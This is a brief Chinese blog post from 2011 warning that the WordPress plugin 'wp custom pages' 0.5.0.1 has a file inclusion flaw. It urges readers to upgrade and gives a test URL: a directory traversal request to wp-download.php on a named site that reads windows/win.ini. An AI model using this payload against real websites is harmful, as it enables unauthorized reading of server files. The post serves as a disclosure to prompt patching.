分类: 网络与安全
2011-04-06 21:47:05
Worepress的一个自定义页面的插件存在远程包含漏洞。
插件名称:wp custom pages 版本:0.5.0.1
有安装的请赶快升级新版本哦。发个测试。如下:
http://www.heimian.com/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini